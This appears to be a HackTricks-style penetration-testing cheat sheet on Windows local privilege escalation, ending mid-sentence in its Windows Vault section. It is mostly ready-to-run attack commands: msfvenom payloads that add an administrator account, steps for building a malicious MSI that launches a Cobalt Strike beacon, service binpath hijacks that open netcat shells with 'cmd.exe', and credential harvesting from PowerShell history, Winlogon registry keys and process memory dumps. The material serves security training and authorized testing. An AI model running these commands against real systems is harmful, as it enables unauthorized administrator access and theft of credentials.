Windows Local Privilege Escalation

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Best tool to look for Windows local privilege escalation vectors: WinPEAS

Initial Windows Theory

Access Tokens

If you don't know what are Windows Access Tokens, read the following page before continuing:

pageAccess Tokens


Check the following page for more info about ACLs - DACLs/SACLs/ACEs:


Integrity Levels

If you don't know what are integrity levels in Windows you should read the following page before continuing:

pageIntegrity Levels

Windows Security Controls

There are different things in Windows that could prevent you from enumerating the system, run executables or even detect your activities. You should read the following page and enumerate all these defenses mechanisms before starting the privilege escalation enumeration:

pageWindows Security Controls

System Info

Version info enumeration

Check if the Windows version has any known vulnerability (check also the patches applied).

systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get system architecture
[System.Environment]::OSVersion.Version #Current OS version
Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid} #List all patches
Get-Hotfix -description "Security update" #List only "Security Update" patches

Version Exploits

This site is handy for searching out detailed information about Microsoft security vulnerabilities. This database has more than 4,700 security vulnerabilities, showing the massive attack surface that a Windows environment presents.

On the system

  • post/windows/gather/enum_patches

  • post/multi/recon/local_exploit_suggester

  • winpeas (Winpeas has watson embedded)

Locally with system information

Github repos of exploits:


Any credential/Juicy info saved in the env variables?

dir env:
Get-ChildItem Env: | ft Key,Value

PowerShell History

ConsoleHost_history #Find the PATH where is saved

type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw

PowerShell Transcript files

You can learn how to turn this on in

#Check is enable in the registry
reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\Transcription
dir C:\Transcripts

#Start a Transcription session
Start-Transcript -Path "C:\transcripts\transcript0.txt" -NoClobber

PowerShell Module Logging

Details of PowerShell pipeline executions are recorded, encompassing executed commands, command invocations, and parts of scripts. However, complete execution details and output results might not be captured.

To enable this, follow the instructions in the "Transcript files" section of the documentation, opting for "Module Logging" instead of "Powershell Transcription".

reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging

To view the last 15 events from PowersShell logs you can execute:

Get-WinEvent -LogName "windows Powershell" | select -First 15 | Out-GridView

PowerShell Script Block Logging

A complete activity and full content record of the script's execution is captured, ensuring that every block of code is documented as it runs. This process preserves a comprehensive audit trail of each activity, valuable for forensics and analyzing malicious behavior. By documenting all activity at the time of execution, detailed insights into the process are provided.

reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging

Logging events for the Script Block can be located within the Windows Event Viewer at the path: Application and Services Logs > Microsoft > Windows > PowerShell > Operational. To view the last 20 events you can use:

Get-WinEvent -LogName "Microsoft-Windows-Powershell/Operational" | select -first 20 | Out-Gridview

Internet Settings

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings"


wmic logicaldisk get caption || fsutil fsinfo drives
wmic logicaldisk get caption,description,providername
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root


You can compromise the system if the updates are not requested using httpS but http.

You start by checking if the network uses a non-SSL WSUS update by running the following:

reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer

If you get a reply such as:

      WUServer    REG_SZ

And if HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer is equals to 1.

Then, it is exploitable. If the last registry is equals to 0, then, the WSUS entry will be ignored.

In orther to exploit this vulnerabilities you can use tools like: Wsuxploit, pyWSUS - These are MiTM weaponized exploits scripts to inject 'fake' updates into non-SSL WSUS traffic.

Read the research here:

WSUS CVE-2020-1013

Read the complete report here. Basically, this is the flaw that this bug exploits:

If we have the power to modify our local user proxy, and Windows Updates uses the proxy configured in Internet Explorer’s settings, we therefore have the power to run PyWSUS locally to intercept our own traffic and run code as an elevated user on our asset.

Furthermore, since the WSUS service uses the current user’s settings, it will also use its certificate store. If we generate a self-signed certificate for the WSUS hostname and add this certificate into the current user’s certificate store, we will be able to intercept both HTTP and HTTPS WSUS traffic. WSUS uses no HSTS-like mechanisms to implement a trust-on-first-use type validation on the certificate. If the certificate presented is trusted by the user and has the correct hostname, it will be accepted by the service.

You can exploit this vulnerability using the tool WSUSpicious (once it's liberated).


A local privilege escalation vulnerability exists in Windows domain environments under specific conditions. These conditions include environments where LDAP signing is not enforced, users possess self-rights allowing them to configure Resource-Based Constrained Delegation (RBCD), and the capability for users to create computers within the domain. It is important to note that these requirements are met using default settings.

Find the exploit in

For more information about the flow of the attack check


If these 2 registers are enabled (value is 0x1), then users of any privilege can install (execute) *.msi files as NT AUTHORITY\SYSTEM.

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Metasploit payloads

msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi-nouac -o alwe.msi #No uac format
msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o alwe.msi #Using the msiexec the uac wont be prompted

If you have a meterpreter session you can automate this technique using the module exploit/windows/local/always_install_elevated


Use the Write-UserAddMSI command from power-up to create inside the current directory a Windows MSI binary to escalate privileges. This script writes out a precompiled MSI installer that prompts for a user/group addition (so you will need GIU access):


Just execute the created binary to escalate privileges.

MSI Wrapper

Read this tutorial to learn how to create a MSI wrapper using this tools. Note that you can wrap a ".bat" file if you just want to execute command lines

pageMSI Wrapper

Create MSI with WIX

pageCreate MSI with WIX

Create MSI with Visual Studio

  • Generate with Cobalt Strike or Metasploit a new Windows EXE TCP payload in C:\privesc\beacon.exe

  • Open Visual Studio, select Create a new project and type "installer" into the search box. Select the Setup Wizard project and click Next.

  • Give the project a name, like AlwaysPrivesc, use C:\privesc for the location, select place solution and project in the same directory, and click Create.

  • Keep clicking Next until you get to step 3 of 4 (choose files to include). Click Add and select the Beacon payload you just generated. Then click Finish.

  • Highlight the AlwaysPrivesc project in the Solution Explorer and in the Properties, change TargetPlatform from x86 to x64.

    • There are other properties you can change, such as the Author and Manufacturer which can make the installed app look more legitimate.

  • Right-click the project and select View > Custom Actions.

  • Right-click Install and select Add Custom Action.

  • Double-click on Application Folder, select your beacon.exe file and click OK. This will ensure that the beacon payload is executed as soon as the installer is run.

  • Under the Custom Action Properties, change Run64Bit to True.

  • Finally, build it.

    • If the warning File 'beacon-tcp.exe' targeting 'x64' is not compatible with the project's target platform 'x86' is shown, make sure you set the platform to x64.

MSI Installation

To execute the installation of the malicious .msi file in background:

msiexec /quiet /qn /i C:\Users\Steve.INFERNO\Downloads\alwe.msi

To exploit this vulnerability you can use: exploit/windows/local/always_install_elevated

Antivirus and Detectors

Audit Settings

These settings decide what is being logged, so you should pay attention

reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit


Windows Event Forwarding, is interesting to know where are the logs sent

reg query HKLM\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager


LAPS is designed for the management of local Administrator passwords, ensuring that each password is unique, randomised, and regularly updated on computers joined to a domain. These passwords are securely stored within Active Directory and can only be accessed by users who have been granted sufficient permissions through ACLs, allowing them to view local admin passwords if authorized.



If active, plain-text passwords are stored in LSASS (Local Security Authority Subsystem Service). More info about WDigest in this page.

reg query 'HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' /v UseLogonCredential

LSA Protection

Starting with Windows 8.1, Microsoft introduced enhanced protection for the Local Security Authority (LSA) to block attempts by untrusted processes to read its memory or inject code, further securing the system. More info about LSA Protection here.

reg query 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA' /v RunAsPPL

Credentials Guard

Credential Guard wasn introduced in Windows 10. Its purpose is to safeguard the credentials stored on a device against threats like pass-the-hash attacks.| More info about Credentials Guard here.

reg query 'HKLM\System\CurrentControlSet\Control\LSA' /v LsaCfgFlags

Cached Credentials

Domain credentials are authenticated by the Local Security Authority (LSA) and utilized by operating system components. When a user's logon data is authenticated by a registered security package, domain credentials for the user are typically established. More info about Cached Credentials here.


Users & Groups

Enumerate Users & Groups

You should check if any of the groups where you belong have interesting permissions

net users %username% #Me
net users #All local users
net localgroup #Groups
net localgroup Administrators #Who is inside Administrators group
whoami /all #Check the privileges

# PS
Get-WmiObject -Class Win32_UserAccount
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
Get-LocalGroupMember Administrators | ft Name, PrincipalSource

Privileged groups

If you belongs to some privileged group you may be able to escalate privileges. Learn about privileged groups and how to abuse them to escalate privileges here:

pagePrivileged Groups

Token manipulation

Learn more about what is a token in this page: Windows Tokens. Check the following page to learn about interesting tokens and how to abuse them:

pageAbusing Tokens

Logged users / Sessions

klist sessions

Home folders

dir C:\Users
Get-ChildItem C:\Users

Password Policy

net accounts

Get the content of the clipboard

powershell -command "Get-Clipboard"

Running Processes

File and Folder Permissions

First of all, listing the processes check for passwords inside the command line of the process. Check if you can overwrite some binary running or if you have write permissions of the binary folder to exploit possible DLL Hijacking attacks:

Tasklist /SVC #List processes running and services
tasklist /v /fi "username eq system" #Filter "system" processes

#With allowed Usernames
Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize

#Without usernames
Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id

Always check for possible electron/cef/chromium debuggers running, you could abuse it to escalate privileges.

Checking permissions of the processes binaries

for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do (
	for /f eol^=^"^ delims^=^" %%z in ('echo %%x') do (
		icacls "%%z" 
2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo.

Checking permissions of the folders of the processes binaries (DLL Hijacking)

for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v 
"system32"^|find ":"') do for /f eol^=^"^ delims^=^" %%y in ('echo %%x') do (
	icacls "%%~dpy\" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users 
todos %username%" && echo.

Memory Password mining

You can create a memory dump of a running process using procdump from sysinternals. Services like FTP have the credentials in clear text in memory, try to dump the memory and read the credentials.

procdump.exe -accepteula -ma <proc_name_tasklist>

Insecure GUI apps

Applications running as SYSTEM may allow an user to spawn a CMD, or browse directories.

Example: "Windows Help and Support" (Windows + F1), search for "command prompt", click on "Click to open Command Prompt"


Get a list of services:

net start
wmic service list brief
sc query


You can use sc to get information of a service

sc qc <service_name>

It is recommended to have the binary accesschk from Sysinternals to check the required privilege level for each service.

accesschk.exe -ucqv <Service_Name> #Check rights for different groups

It is recommended to check if "Authenticated Users" can modify any service:

accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -uwcqv %USERNAME% * /accepteula
accesschk.exe -uwcqv "BUILTIN\Users" * /accepteula 2>nul
accesschk.exe -uwcqv "Todos" * /accepteula ::Spanish version

You can download accesschk.exe for XP for here

Enable service

If you are having this error (for example with SSDPSRV):

System error 1058 has occurred. The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.

You can enable it using

sc config SSDPSRV start= demand
sc config SSDPSRV obj= ".\LocalSystem" password= ""

Take into account that the service upnphost depends on SSDPSRV to work (for XP SP1)

Another workaround of this problem is running:

sc.exe config usosvc start= auto

Modify service binary path

In the scenario where the "Authenticated users" group possesses SERVICE_ALL_ACCESS on a service, modification of the service's executable binary is possible. To modify and execute sc:

sc config <Service_Name> binpath= "C:\nc.exe -nv 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config <Service_Name> binpath= "net localgroup administrators username /add"
sc config <Service_Name> binpath= "cmd \c C:\Users\nc.exe 4444 -e cmd.exe"

sc config SSDPSRV binpath= "C:\Documents and Settings\PEPE\meter443.exe"

Restart service

wmic service NAMEOFSERVICE call startservice
net stop [service name] && net start [service name]

Privileges can be escalated through various permissions:

  • SERVICE_CHANGE_CONFIG: Allows reconfiguration of the service binary.

  • WRITE_DAC: Enables permission reconfiguration, leading to the ability to change service configurations.

  • WRITE_OWNER: Permits ownership acquisition and permission reconfiguration.

  • GENERIC_WRITE: Inherits the ability to change service configurations.

  • GENERIC_ALL: Also inherits the ability to change service configurations.

For the detection and exploitation of this vulnerability, the exploit/windows/local/service_permissions can be utilized.

Services binaries weak permissions

Check if you can modify the binary that is executed by a service or if you have write permissions on the folder where the binary is located (DLL Hijacking). You can get every binary that is executed by a service using wmic (not in system32) and check your permissions using icacls:

for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> %temp%\perm.txt

for /f eol^=^"^ delims^=^" %a in (%temp%\perm.txt) do cmd.exe /c icacls "%a" 2>nul | findstr "(M) (F) :\"

You can also use sc and icacls:

sc query state= all | findstr "SERVICE_NAME:" >> C:\Temp\Servicenames.txt
FOR /F "tokens=2 delims= " %i in (C:\Temp\Servicenames.txt) DO @echo %i >> C:\Temp\services.txt
FOR /F %i in (C:\Temp\services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> C:\Temp\path.txt

Services registry modify permissions

You should check if you can modify any service registry. You can check your permissions over a service registry doing:

reg query hklm\System\CurrentControlSet\Services /s /v imagepath #Get the binary paths of the services

#Try to write every service with its current content (to check if you have write permissions)
for /f %a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\ 2>nul & reg save %a %temp%\ 2>nul && reg restore %a %temp%\ 2>nul && echo You can modify %a

get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "<Username> Users Path Everyone"

It should be checked whether Authenticated Users or NT AUTHORITY\INTERACTIVE possess FullControl permissions. If so, the binary executed by the service can be altered.

To change the Path of the binary executed:

reg add HKLM\SYSTEM\CurrentControlSet\services\<service_name> /v ImagePath /t REG_EXPAND_SZ /d C:\path\new\binary /f

Services registry AppendData/AddSubdirectory permissions

If you have this permission over a registry this means to you can create sub registries from this one. In case of Windows services this is enough to execute arbitrary code:

pageAppendData/AddSubdirectory permission over service registry

Unquoted Service Paths

If the path to an executable is not inside quotes, Windows will try to execute every ending before a space.

For example, for the path C:\Program Files\Some Folder\Service.exe Windows will try to execute:

C:\Program Files\Some.exe 
C:\Program Files\Some Folder\Service.exe

List all unquoted service paths, excluding those belonging to built-in Windows services:

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """
wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\\Windows\\system32\\" |findstr /i /v """ #Not only auto services

#Other way
for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do (
	for /f "delims=: tokens=1*" %%r in ('sc qc "%%~n" ^| findstr BINARY_PATH_NAME ^| findstr /i /v /l /c:"c:\windows\system32" ^| findstr /v /c:""""') do (
		echo %%~s | findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (echo %%n && echo %%~s && icacls %%s | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%") && echo.
gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name

You can detect and exploit this vulnerability with metasploit: exploit/windows/local/trusted\_service\_path You can manually create a service binary with metasploit:

msfvenom -p windows/exec CMD="net localgroup administrators username /add" -f exe-service -o service.exe

Recovery Actions

Windows allows users to specify actions to be taken if a service fails. This feature can be configured to point to a binary. If this binary is replaceable, privilege escalation might be possible. More details can be found in the official documentation.


Installed Applications

Check permissions of the binaries (maybe you can overwrite one and escalate privileges) and of the folders (DLL Hijacking).

dir /a "C:\Program Files"
dir /a "C:\Program Files (x86)"

Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name

Write Permissions

Check if you can modify some config file to read some special file or if you can modify some binary that is going to be executed by an Administrator account (schedtasks).

A way to find weak folder/files permissions in the system is doing:

accesschk.exe /accepteula 
# Find all weak folder permissions per drive.
accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\
accesschk.exe -uwdqs "Everyone" c:\
# Find all weak file permissions per drive.
accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*
accesschk.exe -uwdqs "Everyone" c:\*.*
icacls "C:\Program Files\*" 2>nul | findstr "(F) (M) :\" | findstr ":\ everyone authenticated users todos %username%"
icacls ":\Program Files (x86)\*" 2>nul | findstr "(F) (M) C:\" | findstr ":\ everyone authenticated users todos %username%"
Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'Everyone'} } catch {}} 

Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'BUILTIN\Users'} } catch {}}

Run at startup

Check if you can overwrite some registry or binary that is going to be executed by a different user. Read the following page to learn more about interesting autoruns locations to escalate privileges:

pagePrivilege Escalation with Autoruns


Look for possible third party weird/vulnerable drivers

driverquery.exe /fo table
driverquery /SI

PATH DLL Hijacking

If you have write permissions inside a folder present on PATH you could be able to hijack a DLL loaded by a process and escalate privileges.

Check permissions of all folders inside PATH:

for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. )

For more information about how to abuse this check:

pageWritable Sys Path +Dll Hijacking Privesc



net view #Get a list of computers
net view /all /domain [domainname] #Shares on the domains
net view \\computer /ALL #List shares of a computer
net use x: \\computer\share #Mount the share locally
net share #Check current shares

hosts file

Check for other known computers hardcoded on the hosts file

type C:\Windows\System32\drivers\etc\hosts

Network Interfaces & DNS

ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft

Open Ports

Check for restricted services from the outside

netstat -ano #Opened ports?

Routing Table

route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex

ARP Table

arp -A
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,L

Firewall Rules

Check this page for Firewall related commands (list rules, create rules, turn off, turn off...)

More commands for network enumeration here

Windows Subsystem for Linux (wsl)


Binary bash.exe can also be found in C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe

If you get root user you can listen on any port (the first time you use nc.exe to listen on a port it will ask via GUI if nc should be allowed by the firewall).

wsl whoami
./ubuntun1604.exe config --default-user root
wsl whoami

To easily start bash as root, you can try --default-user root

You can explore the WSL filesystem in the folder C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\

Windows Credentials

Winlogon Credentials

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername"

#Other way
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultDomainName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultPassword

Credentials manager / Windows vault

From The Windows Vault stores user credentials for servers, websites and other programs that Windows can log in the users automatically. At first instance, this might look like now users can store their Facebook credentials, Twitter credentials, Gmail credentials etc., so that they automatically log in via browsers. But it is not so